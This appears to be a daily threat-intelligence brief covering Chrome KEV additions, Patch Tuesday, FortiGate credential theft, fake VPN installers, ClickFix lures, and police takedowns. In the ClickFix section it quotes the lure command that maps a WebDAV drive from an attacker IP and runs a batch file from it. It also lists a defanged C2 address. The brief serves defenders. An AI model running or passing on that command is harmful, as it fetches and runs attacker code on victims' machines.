CVE-2025-59718, CVE-2025-59719, CVE-2026-0385, CVE-2026-21262, CVE-2026-24858, CVE-2026-26127, CVE-2026-26144, CVE-2026-27171, CVE-2026-31802, CVE-2026-3381, CVE-2026-3909, CVE-2026-3910, CVE-2026-3926, CVE-2026-3929, CVE-2026-3930, CVE-2026-3931, CVE-2026-3939, CVE-2026-3941, CVE-2026-3942
Domains:
170[.]255, 170[.]155, 170[.]155.
Get tomorrow's brief in your inbox
Today: Threat actors are mass-distributing fake VPN clients via SEO poisoning to steal credentials. FortiGate appliances are being exploited to extract AD service account credentials. CISA added two actively exploited Chrome vulnerabilities to the KEV catalog, both patched in the latest browser updates. Microsoft's Patch Tuesday fixed 79 vulnerabilities including two zero-days.
Google Chrome Vulnerabilities Added to CISA KEV (CVE-2026-3909, CVE-2026-3910)
CISA added two Chrome vulnerabilities to the Known Exploited Vulnerabilities catalog based on evidence of active exploitation. CVE-2026-3909 is an out-of-bounds write in Google Skia. CVE-2026-3910 is an unspecified vulnerability in the V8 JavaScript engine. Google confirmed exploits exist in the wild for CVE-2026-3910. Both have low EPSS scores (0.001, 21st and 23rd percentile), but active exploitation overrides predictive scoring.
Microsoft Patch Tuesday (79 Vulnerabilities, 2 Zero-Days)
Microsoft released fixes for 79 vulnerabilities in March, including two publicly disclosed zero-days. CVE-2026-21262 is an SQL Server elevation-of-privilege flaw (EPSS 0.001). CVE-2026-26127 is a .NET denial-of-service bug (EPSS 0.000). Neither zero-day is actively exploited. Three critical vulnerabilities include two remote code execution bugs in Microsoft Office (exploitable via preview pane) and an Excel information disclosure flaw (CVE-2026-26144) that could leak data through Copilot.
FortiGate Next-Gen Firewalls Exploited for Network Access
Attackers are exploiting FortiGate NGFW appliances to breach networks and extract configuration files containing AD and LDAP service account credentials. SentinelOne's DFIR team tracked multiple incidents leveraging CVE-2025-59718 (CISA KEV, EPSS 0.020), CVE-2025-59719 (EPSS 0.002), and CVE-2026-24858 (CISA KEV, EPSS 0.028), plus weak credentials. Attackers extracted config files, decrypted LDAP service account credentials, and used them to enroll rogue workstations into Active Directory. In one case, attackers created a local admin account named "support" and added unrestricted firewall policies. Victims did not retain appliance logs, preventing incident analysis.
1 claim tracked from the Nova ransomware group (rebrand of RALord):
| Group | Victim | Sector | Country |
|---|---|---|---|
| Nova | Mid-America Export Experts | Unknown | Unknown |
These are unverified claims from ransomware leak sites, not confirmed breaches.
Storm-2561 Campaign: Fake VPN Clients Steal Credentials
Threat group Storm-2561 is distributing fake enterprise VPN clients via SEO poisoning to steal VPN credentials. The campaign targets users searching for Ivanti Pulse Secure, Cisco, Fortinet, SonicWall, Check Point, and WatchGuard VPN downloads on Bing. Attackers manipulate search rankings to redirect victims to spoofed vendor sites that link to malicious MSI installers hosted on GitHub. The installer drops Pulse.exe into %CommonFiles%\Pulse Secure, then sideloads dwmapi.dll (loader) and inspector.dll (Hyrax infostealer variant). A legitimate-looking login interface captures credentials and exfiltrates them. The malware also steals VPN config data from connectionsstore.dat. After credential theft, the fake client displays an installation error and redirects victims to the real vendor site, reducing suspicion. The malware uses the Windows RunOnce registry key for persistence. Files were digitally signed with a legitimate but now-revoked certificate from Taiyuan Lihua Near Information Technology Co. Microsoft has taken down the attacker-controlled GitHub repositories.
New ClickFix Variant Uses WebDAV Mapping
A new ClickFix variant convinces users to execute a malicious command via Win+R that maps a network drive from an external server (net use Z: http://94.156.170[.]255/webdav), executes a batch file from the drive (update.cmd), then removes the mapped drive. The batch script downloads a ZIP archive containing a trojanized WorkFlowy application (Electron bundle) with malicious code injected into the app.asar archive. The app acts as a C2 beacon and dropper. This variant bypassed Microsoft Defender for Endpoint. Atos security teams detected it via threat hunting focused on execution through the RunMRU registry key.
INTERPOL Operation Synergia III: 45,000 Malicious IPs Sinkholed
INTERPOL-led Operation Synergia III (July 2025 to January 2026) sinkholed 45,000 IP addresses and servers linked to phishing, malware, and ransomware. 72 countries participated, leading to 94 arrests and 110 suspects under investigation. 212 electronic devices and servers were seized. Bangladesh arrested 40 suspects running loan/job scams, identity theft, and credit card fraud. Togo arrested 10 suspects running romance scams and sextortion after hacking social media accounts. Macau identified 33,000 phishing sites impersonating casinos, banks, government sites, and payment services.
SmartApeSG Campaign Pushes Remcos RAT via ClickFix
The SmartApeSG campaign (also tracked as ZPHP, HANEYMANEY) uses fake CAPTCHA pages to deliver Remcos RAT. Legitimate but compromised websites have injected SmartApeSG scripts that generate fake "verify you are human" pages with ClickFix instructions. Users are instructed to open a run window and paste a script. The script downloads a ZIP archive saved with a .pdf extension containing Remcos RAT packaged with DLL side-loading. The malware is persistent via Windows Registry updates. Post-infection traffic connects to 193.178.170[.]155:443 using TLSv1.3 with a self-signed certificate.
FBI Investigation: Malicious Steam Games Spread Cryptodrainas and Infostealers
The FBI is seeking victims of eight malicious Steam games that distributed malware between May 2024 and January 2026. Games include BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi, and Tokenova. BlockBlasters was initially clean, then cryptodrainer malware was added later. Victims lost cryptocurrency wallets and credentials. Blockchain investigator ZachXBT estimated attackers stole $150,000 from 261 Steam accounts. Chemia contained HijackLoader malware that downloaded Vidar infostealer and custom Fickle Stealer. PirateFi also distributed Vidar infostealer. The FBI is asking victims to report cryptocurrency theft, compromised accounts, and stolen funds via [email protected].
Windows 11 February 2026 Updates Cause C:\ Drive Access Denial on Samsung PCs
Microsoft is investigating an issue affecting Samsung laptops running Windows 11 24H2 and 25H2 after installing February 2026 security updates. Users lose access to the C:\ drive with "C:\ is not accessible - Access denied" errors. The issue prevents launching applications including Outlook, Office, browsers, system utilities, and Quick Assist. Microsoft suspects the issue is related to the Samsung Share application. The problem is primarily affecting Samsung Galaxy Book 4 devices in Brazil, Portugal, South Korea, and India. A workaround posted by a Reddit user changes ownership of the entire C:\ drive to the "Everyone" group, but this weakens Windows security protections. Microsoft advises users to wait for an official fix rather than apply the workaround.
BlackCat Insider Charged: Former DigitalMint Employee Conspired with Ransomware Group
Former DigitalMint employee Angelo Martino was charged for conspiring with the BlackCat (ALPHV) ransomware group while serving as a ransomware negotiator. Martino shared confidential negotiation details and participated in attacks as a BlackCat affiliate between 2023 and 2025. Victims included multiple U.S. organizations, with ransom payments exceeding $26 million. BlackCat operators received a 20% cut of proceeds. Since BlackCat's emergence in 2021, the FBI has attributed thousands of targets and over $300 million in ransom payments to the group.
SocksEscort Cybercrime Proxy Network Dismantled
U.S. and European law enforcement dismantled the SocksEscort cybercrime proxy network, which maintained roughly 20,000 compromised Linux edge devices weekly infected with AVRecon malware. The service offered criminals access to clean residential IP addresses from major ISPs to evade blocklists. Since 2020, the platform advertised access to hundreds of thousands of IPs. Authorities seized dozens of servers and domains, froze $3.5 million in cryptocurrency, and disconnected infected routers.
Classic Outlook Bugs: Sync Issues, Connection Errors, Disappearing Mouse Pointer
Microsoft is investigating multiple issues in classic Outlook. One bug causes "Can't connect to the server" errors when creating groups when Exchange Web Services is enabled. The AD Graph call for ValidateUnifiedGroupProperties fails. Microsoft is releasing updated group functionality using REST APIs. Until then, users should create groups in new Outlook or OWA. Another issue triggers 0x800CCC0F and 0x80070057 errors when syncing Gmail and Yahoo accounts after changing passwords. The workaround is to delete registry entries for the affected email address under the Identities key. A third bug causes the mouse pointer to disappear in Outlook, OneNote, and other Microsoft 365 apps. Workarounds include clicking an email or switching to PowerPoint and back.
Poland's Nuclear Research Centre Targeted by Cyberattack
Poland's National Centre for Nuclear Research (NCBJ) says hackers targeted its IT infrastructure, but the attack was detected and blocked. The MARIA reactor (Poland's only nuclear reactor) was not impacted and continues to operate safely. Polish authorities found indicators suggesting Iran may be behind the attack, but investigators are cautious as these may be false flags. Poland has been targeted by Russian cyber actors in 31 confirmed incidents between mid-2025 and early-2026.
Meta to Discontinue Instagram End-to-End Encryption After May 2026
Meta announced it will discontinue support for end-to-end encryption for Instagram chats after May 8, 2026. Meta stated that very few people were opting in to E2EE messaging in DMs, so the option is being removed. Users who want E2EE messaging can use WhatsApp instead. Instagram E2EE was tested starting in 2021 and is only available in some areas. It is not enabled by default. The decision follows TikTok's statement that it does not plan to introduce E2EE, citing concerns that the technology makes users less safe by preventing detection of illegal activities.
GitHub Removes Premium Models from Free Copilot Student Plan
GitHub removed premium AI models (GPT-5.4, Claude Opus, Claude Sonnet) from its free GitHub Copilot Student plan starting March 12, 2026. The student plan still has access to Claude 4.5 Haiku, Gemini 3.1 Pro, and GPT-5.3 Codex. Costlier top-performing models are no longer available. GitHub VP Martin Woodward said the change was made to keep Copilot free and accessible for millions of students. Students can upgrade to paid GitHub Copilot Pro or Pro+ plans to access premium models. The decision received 2,874 down votes compared to 21 up votes.
CVE-2026-27171 (zlib CPU Consumption)
zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 due to a loop with no termination condition. EPSS 0.000 (0th percentile).
CVE-2026-31802 (node-tar Symlink Path Traversal)
node-tar symlink path traversal via drive-relative linkpath. EPSS 0.000 (0th percentile).
CVE-2026-3381 (Perl Compress::Raw::Zlib)
Compress::Raw::Zlib versions through 2.219 for Perl use potentially insecure versions of zlib. EPSS 0.001 (22nd percentile).
CVE-2026-0385 (Microsoft Edge for Android Spoofing)
Microsoft Edge for Android spoofing vulnerability. No EPSS data available.
Multiple Chromium Vulnerabilities (Microsoft Edge)
Microsoft Edge (Chromium-based) ingests Chromium patches for multiple vulnerabilities: CVE-2026-3942 (incorrect security UI in PictureInPicture), CVE-2026-3931 (heap buffer overflow in Skia), CVE-2026-3941 (insufficient policy enforcement in DevTools), CVE-2026-3939 (use after free in WebView), CVE-2026-3929 (side-channel information leakage in ResourceTiming), CVE-2026-3926 (out of bounds read in V8), CVE-2026-3930 (unsafe navigation). All have low EPSS scores (0.000-0.001).
Credential theft campaigns are converging on social engineering techniques that exploit user trust in software vendors and search engines. The Storm-2561 fake VPN campaign and the ClickFix variants both rely on users executing malicious code themselves after being deceived by legitimate-looking interfaces. The FortiGate exploitation pattern shows that network security appliances continue to be high-value targets because compromising them grants attackers access to service account credentials and network topology information. Law enforcement actions like Operation Synergia III demonstrate continued international cooperation to disrupt cybercrime infrastructure, but the arrest and seizure numbers remain small compared to the overall cybercrime ecosystem.